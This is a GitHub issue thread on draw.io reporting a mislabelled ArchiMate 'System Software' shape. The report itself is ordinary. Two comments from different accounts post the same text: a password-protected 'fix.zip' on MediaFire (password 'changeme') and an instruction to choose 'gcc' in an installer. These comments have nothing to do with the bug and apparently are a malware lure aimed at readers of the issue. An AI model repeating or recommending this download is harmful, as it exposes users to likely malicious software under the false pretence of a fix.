### ISSUE TITLE
 Incorrect Label for ArchiMate Shape in Technology Category

### ISSUE THREAD

**Issue by YaninaLeanIX** [jgraph/drawio#4625]
### Preflight Checklist

* [x ] I agree to follow the [Code of Conduct](https://github.com/jgraph/drawio/blob/master/CODE_OF_CONDUCT.md) that this project adheres to.
* [x ] I have searched the issue tracker for a feature request that matches the one I want to file, without success.

You must agree to search and the code of conduct. You must fill in this entire template. If you delete part/all or miss parts out your issue will be closed.

If you are technical, you should reporting bugs along the lines of https://marker.io/blog/how-to-write-bug-report. If you are not technical, we will make allowances, please try to make an effort to understand the process.

**Describe the bug**
A label issue has been identified in the ArchiMate shapes under the Technology category. Specifically, the label of the shape "Device" is wrong. It should be named "System Software"

**To Reproduce**
1. Open the ArchiMate shapes library.
2. Navigate to the Technology category.
3. Locate the shape with two overlapping circles (intended to represent "System Software" but it is named "Device").
4. Compare this shape with the rectangular "System Software" shape, which correctly displays the symbol in the top right corner.

**Expected behavior**
The two overlapping circles should be correctly labelled as "System Software" and not "Device" to match the symbol used in the rectangular "System Software" shape.

**Screenshots**

- draw.io version 24.7.7

**Desktop (please complete the following information):**
 - OS: iOS
 - Browser [Chrome]
 - Browser Version [Version 128.0.6613.85 ]

**Smartphone (please complete the following information):**
 - Device: [N/A]
 - OS: [N/A]
 - Browser [N/A]
 - Version [N/A]

**I tested the problem in incognito/private mode with all browser extensions switched off, write "yes" below:**
- yes
<img width="886" alt="Screenshot 2024-08-28 at 12 41 12" src="https://github.com/user-attachments/assets/58935db8-f186-4075-a003-5aa0023e4ae3">
yes

**Additional context**

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
